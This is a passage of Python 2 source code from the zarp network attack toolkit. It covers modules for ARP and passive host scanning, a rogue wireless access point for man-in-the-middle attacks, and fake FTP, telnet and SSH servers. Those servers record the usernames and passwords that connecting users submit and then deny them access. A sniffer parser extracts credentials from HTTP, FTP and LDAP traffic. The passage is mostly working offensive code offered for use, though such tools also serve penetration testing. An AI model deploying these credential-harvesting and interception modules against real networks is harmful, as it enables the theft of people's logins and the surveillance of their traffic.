26 |                 iface = util.enable_monitor(self.channel)
27 |             util.debug('Using interface %s' % iface)
28 |             self.ap_scan(iface)
29 |         except Exception:
30 |             return
31 | 
32 |     def ap_scan(self, adapt):
33 |         """ Sniff on the monitoring adapter
34 |         """
35 |         try:
36 |             util.Msg('Scanning for access points...')
37 |             if self.channel is None:
38 |                 os.system('airodump-ng %s' % adapt)
39 |             else:
40 |                 os.system('airodump-ng --channel %s %s' % (self.channel, adapt))
41 |         except Exception, j:
42 |             util.Error('Error scanning: %s' % j)
43 |         finally:
44 |             util.disable_monitor()
45 | 
46 |     def cli(self, parser):
47 |         """ Add the CLI options
48 |         """
49 |         parser.add_argument('-w', help='Wireless AP Scan', action='store_true',
50 |                             default=False, dest=self.which)
51 | 


--------------------------------------------------------------------------------
/src/modules/scanner/net_map.py:
--------------------------------------------------------------------------------
 1 | import socket
 2 | from datetime import datetime
 3 | from util import Error
 4 | from scapy.all import *
 5 | from scanner import Scanner
 6 | from zoption import Zoption
 7 | 
 8 | 
 9 | class net_map(Scanner):
10 |     def __init__(self):
11 |         super(net_map, self).__init__('NetMap')
12 |         self.available_hosts = {}
13 |         self.config.update({"net_mask":Zoption(type = "ipmask", 
14 |                                         value = None,
15 |                                         required = True, 
16 |                                         display = "Netmask to scan"),
17 |                         "fingerprint":Zoption(type = "bool", 
18 |                                         value = False,
19 |                                         required = False, 
20 |                                         display = "Fingerprint the host")
21 |                            })
22 |         self.info = """
23 |                     Performs an ARP scan of the local network.
24 |                     """
25 | 
26 |     def initialize(self):
27 |         self.scan_block()
28 | 
29 |     def scan_block(self):
30 |         """ ARPing the local network
31 |         """
32 |         net_mask = self.config['net_mask'].value
33 |         conf.verb = 0
34 |         print '[!] Beginning host scan with netmask %s...' % (net_mask)
35 |         try:
36 |             start = datetime.now()
37 |             (ans, unans) = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=net_mask),timeout=1, inter=0.1,multi=True)
38 |             elapsed = (datetime.now() - start).seconds
39 |             print '[!] Scan of %s completed in %s seconds with %d hosts responding.'%(net_mask,elapsed,len(ans))
40 |             for s, r in ans:
41 |                 ip = r[ARP].getfieldval('psrc')
42 |                 mac = r[ARP].getfieldval('hwsrc')
43 |                 if self.config['fingerprint'].value:
44 |                     host = ''
45 |                     try:
46 |                         if hasattr(socket, 'setdefaulttimeout'):
47 |                             socket.setdefaulttimeout(3)
48 |                         host = socket.gethostbyaddr(ip)[0]
49 |                     except:
50 |                         host = ''
51 |                     print "\t%s : %s (%s)" % (mac, ip, host)
52 |                     self._dbhost(mac, ip, host)
53 |                 else:
54 |                     print '\t%s : %s' % (mac, ip)
55 |                     self._dbhost(mac, ip, '')
56 |                 self.available_hosts[mac] = ip
57 |         except Exception:
58 |             Error('Error with net mask.  Cannot scan given block.')
59 |             return
60 |         print '\n'
61 | 
62 |     def view(self):
63 |         """ Dump previous scan results
64 |         """
65 |         print '\n\t\033[32m[!] Available hosts in range %s:\033[0m' \
66 |                                             % self.config['net_mask'].value
67 |         for mac in self.available_hosts.keys():
68 |             print '\t%s : %s' % (mac, self.available_hosts[mac])
69 | 
70 |     def cli(self, parser):
71 |         """ Add CLI options
72 |         """
73 |         parser.add_argument('-s', help='Network scanner',
74 |                         action='store_true', dest=self.which)
75 | 


--------------------------------------------------------------------------------
/src/modules/scanner/passive_scan.py:
--------------------------------------------------------------------------------
  1 | import util
  2 | import socket
  3 | from scapy.all import *
  4 | from sniffer.sniffer import Sniffer
  5 | 
  6 | 
  7 | class Address:
  8 |     def __eq__(self, other):
  9 |         return self.ip == other
 10 | 
 11 |     def __init__(self):
 12 |         self.ip   = None
 13 |         self.mac  = None
 14 |         self.host = None
 15 | 
 16 | 
 17 | class passive_scan(Sniffer):
 18 |     def __init__(self):
 19 |         super(passive_scan, self).__init__('Passive Scanner')
 20 |         self.netmap = {}
 21 |         self.config.pop("target", None)
 22 |         self.info = """
 23 |                     Much like the passive scanner in Ettercap, this module 
 24 |                     was designed to passively map the network without 
 25 |                     spewing packets.  This will take some time, as we can 
 26 |                     only sniff what's coming at us.  One packet is sent out,
 27 |                     and that's for rDNS.
 28 |                     """
 29 | 
 30 |     def initialize(self):
 31 |         util.Msg('Initializing passive network map...')
 32 |         self.source = 'Passive Scanner'    # for session view
 33 |         self.sniff_filter = 'arp'          # pick out arp packets
 34 |         self.run()
 35 |         return 'Passive Scanner'
 36 | 
 37 |     def resolve(self, ip):
 38 |         """rdns with a timeout"""
 39 |         socket.setdefaulttimeout(2)
 40 |         try:
 41 |             host = socket.gethostbyaddr(ip)
 42 |         except:
 43 |             host = None
 44 |         if not host is None:
 45 |             host = host[0]
 46 |         return host
 47 | 
 48 |     def dump(self, pkt):
 49 |         """ Fish out broadcast packets and get src/dst
 50 |         """
 51 |         if 'ARP' in pkt:
 52 |             addr = None
 53 |             if pkt[ARP].op == 1:
 54 |                 psrc = pkt[ARP].psrc
 55 |                 if not psrc in self.netmap.keys():
 56 |                     addr = Address()
 57 |                     addr.ip   = psrc
 58 |                     addr.mac  = pkt[ARP].hwsrc
 59 |                     addr.host = self.resolve(psrc)
 60 | 
 61 |                     self.netmap[psrc] = addr
 62 |                 elif self.netmap[psrc].ip != psrc and self.netmap[psrc].mac == pkt[ARP].src:
 63 |                      # IP changed
 64 |                     self.netmap[psrc].ip = psrc
 65 |             elif pkt[ARP].op == 2:
 66 |                 pdst = pkt[ARP].pdst
 67 |                 if not pdst in self.netmap.keys():
 68 |                     addr = Address()
 69 |                     addr.ip    = pdst
 70 |                     addr.mac   = pkt[ARP].hwdst
 71 |                     addr.host  = self.resolve(pdst)
 72 | 
 73 |                     self.netmap[pdst] = addr
 74 |                 elif self.netmap[pdst].ip != pdst and self.netmap[pdst].mac == pkt[ARP].dst:
 75 |                     # IP changed
 76 |                     self.netmap[pdst].ip = pdst
 77 | 
 78 |             if addr is not None:
 79 |                 self._dbhost(addr.mac, addr.ip, addr.host)
 80 | 
 81 |     def view(self):
 82 |         """Overridden Sniffer view
 83 |            since we just need to dump info
 84 |            out
 85 |         """
 86 |         if len(self.netmap) <= 0:
 87 |             util.Msg("No hosts yet mapped.")
 88 |         else:
 89 |             for address in self.netmap.keys():
 90 |                 print '\t%s\t%s\t%s' % (self.netmap[address].ip,
 91 |                                       self.netmap[address].mac,
 92 |                                       self.netmap[address].host)
 93 |             util.Msg('\t %s hosts found.' % len(self.netmap))
 94 | 
 95 |     def session_view(self):
 96 |         """ We're a sniffer, but a scanner, so we don't
 97 |             really have a target.
 98 |         """
 99 |         return "Passive scanner"
100 | 


--------------------------------------------------------------------------------
/src/modules/scanner/scanner.py:
--------------------------------------------------------------------------------
 1 | from module import ZarpModule
 2 | from util import init_app
 3 | from re import search
 4 | import abc
 5 | 
 6 | 
 7 | class Scanner(ZarpModule):
 8 |     """Abstract scanner
 9 |     """
10 |     __metaclass__ = abc.ABCMeta
11 | 
12 |     def __init__(self, which):
13 |         self.target = None
14 |         super(Scanner, self).__init__(which)
15 | 
16 |     def is_alive(self):
17 |         """ Check if the target is responding
18 |         """
19 |         if not self.target is None:
20 |             rval = init_app('ping -c 1 -w 1 %s' % self.target)
21 |             up = search('\d.*? received', rval)
22 |             if search('0', up.group(0)) is None:
23 |                 return True
24 |         return False


--------------------------------------------------------------------------------
/src/modules/services/__init__.py:
--------------------------------------------------------------------------------
1 | __all__ = ['access_point', 'ftp', 'http', 'smb', 'ssh',
2 | 		   'telnet']
3 | 


--------------------------------------------------------------------------------
/src/modules/services/access_point.py:
--------------------------------------------------------------------------------
 1 | import util
 2 | from time import sleep
 3 | from threading import Thread
 4 | from service import Service
 5 | from zoption import Zoption
 6 | 
 7 | 
 8 | class access_point(Service):
 9 |     def __init__(self):
10 |         super(access_point, self).__init__('Access Point')
11 |         self.mon_adapt = None
12 |         del self.config["port"]
13 |         self.config.update({"ap_essid":Zoption(type = "str", 
14 |                                         value = "zoopzop",
15 |                                         required = False, 
16 |                                         display = "Spoofed AP name")
17 |                            })
18 |         self.info = """
19 |                     Implements a fake wireless access point to execute
20 |                     client attacks or set up a wireless mitm that forwards
21 |                     traffic to another device.
22 | 
23 |                     Passthru currently not working; todo.
24 |                     """
25 | 
26 |     def initialize_bg(self):
27 |         """Initialize in background thread"""
28 |         if not util.check_program('airbase-ng'):
29 |             util.Error('\'airbase-ng\' not found in local path.')
30 |             return False
31 | 
32 |         util.Msg('Initializing access point..')
33 |         thread = Thread(target=self.initialize)
34 |         thread.start()
35 | 
36 |         sleep(2)
37 |         if self.running:
38 |             return True
39 |         else:
40 |             return False
41 | 
42 |     def initialize(self):
43 |         """Initialize AP"""
44 |         if not util.check_program('airbase-ng'):
45 |             util.Error('\'airbase-ng\' not found in local path.')
46 |             return False
47 | 
48 |         self.running = True
49 |         ap_proc = None
50 | 
51 |         try:
52 |             self.mon_adapt = util.get_monitor_adapter()
53 |             if self.mon_adapt is None:
54 |                 self.mon_adapt = util.enable_monitor()
55 | 
56 |             if self.mon_adapt is None:
57 |                 util.Error('Could not find a wireless card in monitor mode')
58 |                 self.running = False
59 |                 return None
60 | 
61 |             airbase_cmd = [
62 |                         'airbase-ng',
63 |                         '--essid', self.config['ap_essid'].value,
64 |                         self.mon_adapt
65 |                           ]
66 |             ap_proc = util.init_app(airbase_cmd, False)
67 |             util.Msg('Access point %s running.' % \
68 |                                     self.config['ap_essid'].value)
69 |             raw_input()    # block
70 |         except KeyboardInterrupt:
71 |             self.running = False
72 |         except Exception, er:
73 |             util.Error('Error with wireless AP: %s' % er)
74 |         finally:
75 |             util.disable_monitor()
76 |             util.kill_app(ap_proc)
77 | 
78 |     def cli(self, parser):
79 |         """ establish CLI options
80 |         """
81 |         parser.add_argument('--wap', help='Wireless access point',
82 |                         action='store_true', default=False, dest=self.which)
83 | 


--------------------------------------------------------------------------------
/src/modules/services/ftp.py:
--------------------------------------------------------------------------------
  1 | import util
  2 | import socket
  3 | from service import Service
  4 | from threading import Thread
  5 | from zoption import Zoption
  6 | 
  7 | 
  8 | class ftp(Service):
  9 |     def __init__(self):
 10 |         super(ftp, self).__init__('FTP Server')
 11 |         self.usr = None
 12 |         self.pwd = None
 13 |         self.server_socket = None
 14 |         self.config['port'].value = 21
 15 |         self.config.update({"motd":Zoption(type = "str", 
 16 |                                   value = "b4ll4stS3c FTP Server v1.4",
 17 |                                   required = False,
 18 |                                   display = "Displayed MOTD")
 19 |                         })
 20 |         self.info = """
 21 |                     Emulates a single threaded FTP server.
 22 |                     """
 23 | 
 24 |     def response(self, con, code, txt):
 25 |         """ Format a response to the client """
 26 |         con.send('%d %s\r\n' % (code, txt))
 27 | 
 28 |     def process_com(self, con, data):
 29 |         """ Process the incoming request; logs the
 30 |             username/password and denies access
 31 |         """
 32 |         cmd = data.split(' ')[0].strip()
 33 |         if cmd == 'USER':
 34 |             usr = data.split(' ')[1]
 35 |             if usr is None:
 36 |                 self.response(con, 503, 'Incorrect username.')
 37 |             self.usr = usr.rstrip()
 38 |             self.response(con, 331, 'Specify password.')
 39 |         elif cmd == 'PASS':
 40 |             psswd = data.split(' ')[1]
 41 |             if psswd is None:
 42 |                 self.response(con, 503, 'Incorrect password.')
 43 |             self.pwd = psswd.rstrip()
 44 |             self.response(con, 530, 'Incorrect credentials')
 45 |             return False
 46 |         else:
 47 |             self.response(con, 530, 'Please login first.')
 48 |             return False
 49 |         return True
 50 | 
 51 |     def initialize_bg(self):
 52 |         """ Initialize as a background process
 53 |         """
 54 |         util.Msg('Starting FTP server...')
 55 |         self.server_thread = Thread(target=self.initialize)
 56 |         self.server_thread.start()
 57 |         return True
 58 | 
 59 |     def initialize(self):
 60 |         """ Initialize; blocking
 61 |         """
 62 |         self.running = True
 63 |         self.server_sock = socket.socket()
 64 |         self.server_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
 65 |         try:
 66 |             self.server_sock.bind(('', self.config['port'].value))
 67 |         except:
 68 |             util.Error('Cannot bind to address.')
 69 |             return
 70 | 
 71 |         self.server_sock.settimeout(3)
 72 |         self.server_sock.listen(1)
 73 |         try:
 74 |             while self.running:
 75 |                 try:
 76 |                     conn, addr = self.server_sock.accept()
 77 |                 except KeyboardInterrupt:
 78 |                     return
 79 |                 except:
 80 |                     continue
 81 |                 self.log_msg('Connection from %s' % str(addr))
 82 |                 self.response(conn, 220, self.config['motd'].value)
 83 | 
 84 |                 while self.running:
 85 |                     try:
 86 |                         data = conn.recv(256)
 87 |                         if len(data) > 0 and not self.process_com(conn, data):
 88 |                             break
 89 |                     except socket.error:
 90 |                         break
 91 |                 self.log_msg("Received \033[32m%s:%s\033[33m from connection."
 92 |                                                     % (self.usr, self.pwd))
 93 |                 self.log_msg("\'%s\' disconnected.\n" % (addr[0]))
 94 |                 conn.close()
 95 |         except KeyboardInterrupt:
 96 |             self.running = False
 97 |         except socket.error:
 98 |             # timeout/broken pipe
 99 |             pass
100 |         except Exception:
101 |             pass
102 | 
103 |     def cli(self, parser):
104 |         """ establish cli options
105 |         """
106 |         parser.add_argument('--ftp', help='FTP server', action='store_true',
107 |                                     default=False, dest=self.which)
108 | 


--------------------------------------------------------------------------------
/src/modules/services/service.py:
--------------------------------------------------------------------------------
 1 | from module import ZarpModule
 2 | from zoption import Zoption
 3 | import abc
 4 | 
 5 | 
 6 | class Service(ZarpModule):
 7 |     """Abstract service
 8 |     """
 9 |     __metaclass__ = abc.ABCMeta
10 | 
11 |     def __init__(self, which):
12 |         super(Service, self).__init__(which)
13 |         self.config.update({"port":Zoption(type="int",
14 |                                            value = None,
15 |                                            required = False,
16 |                                            display = "Listen port")
17 |                           })
18 | 
19 |     @abc.abstractmethod
20 |     def initialize_bg(self):
21 |         """ When services are initialized from the CLI,
22 |             they need to be run in their own thread
23 |         """
24 |         raise NotImplementedError
25 | 


--------------------------------------------------------------------------------
/src/modules/services/stubssh.py:
--------------------------------------------------------------------------------
 1 | import paramiko
 2 | import util
 3 | 
 4 | 
 5 | class SSHStub(paramiko.ServerInterface):
 6 |     """ Handler for credentials
 7 |     """
 8 |     def __init__(self, context, *args):
 9 |         self.context = context
10 |         paramiko.ServerInterface.__init__(self, *args)
11 | 
12 |     # handle credentials and always reject
13 |     def check_auth_password(self, username, password):
14 |         if self.context['dump']:
15 |             util.Msg('Received login attempt: %s:%s' % (username, password))
16 |         if self.context['log_data']:
17 |             self.context['log_file'].write('Received login: %s:%s\n'
18 |                                     % (username, password))
19 |             self.context['log_file'].flush()
20 |         return paramiko.AUTH_FAILED
21 | 
22 |     def check_channel_request(self, kind, chanid):
23 |         return paramiko.OPEN_SUCCEEDED
24 | 
25 | 
26 | class SSHHandler(paramiko.SFTPServerInterface):
27 |     pass
28 | 


--------------------------------------------------------------------------------
/src/modules/services/telnet.py:
--------------------------------------------------------------------------------
 1 | import util
 2 | import socket
 3 | from colors import color
 4 | from service import Service
 5 | from threading import Thread
 6 | from zoption import Zoption
 7 | 
 8 | 
 9 | class telnet(Service):
10 |     def __init__(self):
11 |         super(telnet, self).__init__('telnet server')
12 |         self.server_thread = None
13 |         self.server_socket = None
14 |         self.config['port'].value = 23
15 |         self.config.update({"server":Zoption(type = "str",
16 |                                       value = "Unified",
17 |                                       required = False,
18 |                                       display = "Server title to spoof")
19 |                            })
20 |         self.info = """
21 |                     Simple telnet emulator; just grabs a username/password
22 |                     and denies access.  Could be extended to be a sort of
23 |                     honeypot system.
24 |                     """
25 | 
26 |     def response(self, con, msg):
27 |         """ Respond to connection
28 |         """
29 |         con.send('%s' % msg)
30 | 
31 |     def initialize_bg(self):
32 |         """ initialize background service
33 |         """
34 |         util.Msg('Starting telnet service...')
35 |         self.server_thread = Thread(target=self.initialize)
36 |         self.server_thread.start()
37 |         return True
38 | 
39 |     def initialize(self):
40 |         """ initialize; blocking
41 |         """
42 |         self.running = True
43 |         self.server_sock = socket.socket()
44 |         self.server_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
45 | 
46 |         try:
47 |             self.server_sock.bind(('', self.config['port'].value))
48 |         except:
49 |             util.Error('Cannot bind to address.')
50 |             return
51 | 
52 |         self.server_sock.settimeout(3)
53 |         self.server_sock.listen(1)
54 |         try:
55 |             while self.running:
56 |                 try:
57 |                     con, addr = self.server_sock.accept()
58 |                 except KeyboardInterrupt:
59 |                     return
60 |                 except:
61 |                     continue
62 | 
63 |                 self.log_msg('Connection from %s' % str(addr))
64 |                 con.recv(256)  # junk
65 | 
66 |                 while self.running:
67 |                     try:
68 |                         # username/password prompt
69 |                         self.response(con, '%s Username: ' % 
70 |                                                 self.config['server'].value)
71 |                         username = con.recv(256).strip().replace('\n', '')
72 |                         if len(username) < 1:
73 |                             continue
74 | 
75 |                         self.response(con, '%s Password: ' % 
76 |                                                 self.config['server'].value)
77 |                         password = con.recv(256).strip().replace('\n', '')
78 |                         if len(password) < 1:
79 |                             continue
80 | 
81 |                         self.response(con, 'Invalid Credentials\r\n')
82 |                         self.log_msg('Received %s%s:%s%s from connection.' %
83 |                                 (color.GREEN, username, password, color.YELLOW))
84 |                         break
85 |                     except socket.error:
86 |                         break
87 |                 con.close()
88 |                 self.log_msg('%s disconnected.\n' % str(addr))
89 |         except:
90 |             self.server_sock.close()
91 | 
92 |     def cli(self, parser):
93 |         """ initialize CLI options
94 |         """
95 |         parser.add_argument('--telnet', help='Telnet server',
96 |             action='store_true', default=False, dest=self.which)
97 | 


--------------------------------------------------------------------------------
/src/modules/sniffer/__init__.py:
--------------------------------------------------------------------------------
1 | __all__ = ['http_sniffer', 'password_sniffer', 'traffic_sniffer',
2 |           'database_sniffer']
3 | 


--------------------------------------------------------------------------------
/src/modules/sniffer/parser_postgres.py:
--------------------------------------------------------------------------------
  1 | import util
  2 | 
  3 | 
  4 | def endian_int(pkt):
  5 |     """Return an integer from an array of hex bytes"""
  6 |     return int(''.join(pkt), 16)
  7 | 
  8 | 
  9 | def parse_query(pkt):
 10 |     """Parse and return a query"""
 11 |     length = endian_int(pkt[1:5])
 12 | 
 13 |     pkt = pkt[5:]
 14 |     query = ''
 15 |     for i in xrange(length - 4):
 16 |         query += pkt[i].decode('hex')
 17 |     return query
 18 | 
 19 | 
 20 | def database_exists(pkt):
 21 |     """Parse the database packet, return if it
 22 |        checks out or not.
 23 |     """
 24 |     found = True
 25 |     if pkt[9] == '45':
 26 |         found = False
 27 |     return found
 28 | 
 29 | 
 30 | def is_ssl(pkt):
 31 |     """Check if the packet is an SSL request"""
 32 |     if set(pkt) == set(['00', '00', '00', '08',
 33 |                         '04', 'd2', '16', '2f']):
 34 |         return True
 35 |     return False
 36 | 
 37 | 
 38 | def parse_startup(pkt):
 39 |     """Startup packets contain a set of
 40 |        keys and values. Return an array
 41 |        of key/value/key/value/etc..
 42 |     """
 43 |     values = []
 44 |     plen = endian_int(pkt[0:4])
 45 |     pkt = pkt[8:]
 46 | 
 47 |     tmp = ''
 48 |     for i in xrange(plen - 8):
 49 |         tmp += pkt[i].decode('hex')
 50 |         if pkt[i] == '00':
 51 |             values.append(tmp)
 52 |             tmp = ''
 53 |     return values
 54 | 
 55 | 
 56 | def get_columns(pkt):
 57 |     """Parse columns out of a response packet.
 58 |     """
 59 |     columns = []
 60 |     num_columns = endian_int(pkt[5:7])
 61 | 
 62 |     pkt = pkt[7:]
 63 |     ctmp = ''
 64 |     for column in xrange(num_columns):
 65 |         cnt = 0
 66 |         while True:
 67 |             tmp = pkt[cnt]
 68 |             if tmp == '00':
 69 |                 columns.append(ctmp)
 70 |                 ctmp = ''
 71 |                 pkt = pkt[cnt + 19:]
 72 |                 break
 73 |             ctmp += tmp.decode('hex')
 74 |             cnt += 1
 75 |     return (columns, pkt)
 76 | 
 77 | 
 78 | def get_row(pkt):
 79 |     """Return a row of data"""
 80 |     row = []
 81 |     tmp = ''
 82 |     fields = endian_int(pkt[0:2])
 83 |     pkt = pkt[2:]
 84 |     for field in xrange(fields):
 85 |         clen = endian_int(pkt[0:4])
 86 |         if clen == 4294967295:
 87 |             # indicates an empty column
 88 |             row.append('')
 89 |             continue
 90 | 
 91 |         pkt = pkt[4:]
 92 |         for i in xrange(clen):
 93 |             tmp += pkt[i].decode('hex')
 94 |         row.append(tmp)
 95 |         pkt = pkt[clen:]
 96 |         tmp = ''
 97 | 
 98 |     return row
 99 | 
100 | 
101 | def is_done(pkt):
102 |     """Check if packet is a Command Completion
103 |        packet.
104 |     """
105 |     if pkt[0] == '43':
106 |         return True
107 |     return False
108 | 
109 | 
110 | def parse_response(pkt):
111 |     """Parse a query response"""
112 |     data = []
113 | 
114 |     try:
115 |         (columns, pkt) = get_columns(pkt)
116 |         while True:
117 |             if is_done(pkt):
118 |                 break
119 | 
120 |             dlen = endian_int(pkt[1:5]) + 1
121 |             row = get_row(pkt[5:dlen])
122 |             data.append(row)
123 |             pkt = pkt[dlen:]
124 |     except Exception, e:
125 |         util.debug('Error parsing postgres: %s' % e)
126 |     return (columns, data)
127 | 
128 | 
129 | def parse_error(pkt):
130 |     """Parse an error message"""
131 |     elen = endian_int(pkt[1:5])
132 | 
133 |     pkt = pkt[20:]
134 |     error = ''
135 |     for idx in xrange(elen - 20):
136 |         tmp = pkt[idx]
137 |         if tmp == '00':
138 |             break
139 |         error += tmp.decode('hex')
140 |     return error
141 | 


--------------------------------------------------------------------------------
/src/modules/sniffer/password_parser.py:
--------------------------------------------------------------------------------
 1 | import util
 2 | from re import findall
 3 | from base64 import b64decode
 4 | from scapy.all import *
 5 | 
 6 | """ Class houses all of the protocol parsing functions.
 7 |     Each parsing routine should return a tuple of the form: (username, password)
 8 | """
 9 | 
10 | 
11 | def parse_ldap(pkt):
12 |     """ Parse LDAP credentials; only supports simple (0)
13 |         authentication right now.  Scapy doesn't currently
14 |         support LDAP packets, so we'll do this by hand.
15 |     """
16 |     payload = pkt[TCP].payload
17 |     pkt_layer = util.get_layer_bytes(str(payload))
18 | 
19 |     usr, pswd = None, None
20 |     if len(pkt_layer) > 0:
21 |         if pkt_layer[4] == '01':
22 |             # bind request
23 |             usr, pswd = '', ''
24 |             usr_len = int(pkt_layer[11])
25 |             for idx in xrange(usr_len):
26 |                 usr += pkt_layer[12 + idx].decode('hex')
27 | 
28 |             pw_len = int(pkt_layer[13 + usr_len])
29 |             for idx in xrange(pw_len):
30 |                 pswd += pkt_layer[14 + usr_len + idx].decode('hex')
31 |     return (usr, pswd)
32 | 
33 | 
34 | def parse_http(pkt):
35 |     """ Parse out the username/password from an HTTP request.
36 |         This will also parse out any basic authorization requests.
37 |     """
38 |     payload = pkt.getlayer(Raw).load
39 |     usr, pswd = None, None
40 |     if 'username' in payload or 'password' in payload:
41 |         usr = re.search('username=(.*?)(&|$| )', payload)
42 |         pswd = re.search('password=(.*?)(&|$| )', payload)
43 |         if usr is not None:
44 |             usr = usr.groups(0)[0]
45 |         if pswd is not None:
46 |             pswd = pswd.groups(0)[0]
47 |     elif 'Authorization:' in payload:
48 |         pw = re.search('Authorization: Basic (.*)', payload)
49 |         if pw.groups(0) is not None:
50 |             usr = b64decode(pw.groups(0)[0])
51 | 
52 |     return (usr, pswd)
53 | 
54 | 
55 | def parse_ftp(pkt):
56 |     """ Parse out the username or password from FTP
57 |     """
58 |     payload = str(pkt.sprintf("%Raw.load%"))
59 |     # strip control characters
60 |     payload = payload[:-5]
61 |     usr, pswd = None, None
62 | 
63 |     if 'USER' in payload:
64 |         usr = findall("(?i)USER (.*)", payload)[0]
65 |     elif 'PASS' in payload:
66 |         pswd = findall("(?i)PASS (.*)", payload)[0]
67 | 
68 |     return (usr, pswd)
69 | 
70 | 
71 | def parse_pkt(pkt):
72 |     """ Initialize parsing of the packet
73 |     """
74 |     if pkt.haslayer(TCP) and pkt.getlayer(TCP).dport == 80 and pkt.haslayer(Raw):
75 |         return parse_http(pkt)
76 |     elif pkt.haslayer(TCP) and pkt.getlayer(TCP).dport == 21:
77 |         return parse_ftp(pkt)
78 |     elif pkt.haslayer(TCP) and pkt.getlayer(TCP).dport == 389:
79 |         return parse_ldap(pkt)
80 |     return (None, None)
81 | 


--------------------------------------------------------------------------------
/src/modules/sniffer/sniffer.py:
--------------------------------------------------------------------------------
 1 | from module import ZarpModule
 2 | from scapy.all import sniff
 3 | from threading import Thread
 4 | from zoption import Zoption
 5 | import util
 6 | import config
 7 | import abc
 8 | 
 9 | 
10 | class Sniffer(ZarpModule):
11 |     """ Abstract sniffer """
12 |     __metaclass__ = abc.ABCMeta
13 | 
14 |     def __init__(self, which):
15 |         super(Sniffer, self).__init__(which)
16 |         self.sniff_filter = None              # filter for the traffic sniffer
17 |         # initialize thread
18 |         self.sniff_thread = Thread(target=self.traffic_sniffer)
19 | 
20 |         self.config.update({"target":Zoption(type = "ip",
21 |                                       value = config.get("ip_addr"),
22 |                                       required = False,
23 |                                       display = "Address to sniff from")
24 |                            })
25 | 
26 |     @abc.abstractmethod
27 |     def dump(self, pkt):
28 |         raise NotImplementedError
29 | 
30 |     def session_view(self):
31 |         
32 |         """ Session viewer returns source
33 |         """
34 |         return '%s' % self.config['target'].value
35 | 
36 |     def traffic_sniffer(self):
37 |         """ Sniff traffic with the given filter.
38 |             If sniff_filter is not set, an exception is raised
39 |         """
40 |         if self.sniff_filter is None:
41 |             raise NotImplementedError, "sniff_filter not initialized!"
42 | 
43 |         sniff(filter=self.sniff_filter, store=0, prn=self.dump,
44 |                     stopper=self.stop_callback, stopperTimeout=3)
45 | 
46 |     def stop_callback(self):
47 |         """ Initiate a sniffer shutdown"""
48 |         if self.running:
49 |             return False
50 |         util.debug('%s shutting down...' % self.which)
51 |         return True
52 | 
53 |     def run(self):
54 |         """Friendly handler"""
55 |         try:
56 |             self.running = True
57 |             self.sniff_thread.start()
58 |         except Exception, e:
59 |             util.Error('Error with sniffer: %s' % (e))
60 | 


--------------------------------------------------------------------------------
/src/modules/sniffer/traffic_sniffer.py:
--------------------------------------------------------------------------------
 1 | from util import Error, test_filter
 2 | from sniffer import Sniffer
 3 | from scapy.all import *
 4 | from zoption import Zoption
 5 | 
 6 | 
 7 | class traffic_sniffer(Sniffer):
 8 |     def __init__(self):
 9 |         super(traffic_sniffer, self).__init__('Traffic Sniffer')
10 |         self.config.update({"filter":Zoption(type = "str",
11 |                                       value = "src {0} or dst {0}",
12 |                                       required = False,
13 |                                       display = "Traffic filter")
14 |                             })
15 |         self.info = """
16 |                     This module can be used as a simple traffic sniffer.
17 |                     A filter option is provided to use tcpdump/scapy-esque
18 |                     filter syntax to narrow down the information provided."""
19 | 
20 |     def initialize(self):
21 |         """ Initialize sniffer 
22 |         """
23 |         if test_filter(self.config['filter'].value):
24 |             self.sniff_filter = self.config['filter'].value.format(
25 |                                             self.config['target'].value)
26 |             self.run()
27 |         else:
28 |             Error("Error with provided filter.")
29 |             return False
30 |         return True
31 | 
32 |     def dump(self, pkt):
33 |         """ Sniffer callback; print summary
34 |         """
35 |         if not pkt is None:
36 |             self.log_msg(pkt.summary())
37 | 
38 |     def session_view(self):
39 |         """ Overridden to include filter
40 |         """
41 |         return "%s [%s]" % (self.config['target'].value, 
42 |                             self.config['filter'].value)
43 | 


--------------------------------------------------------------------------------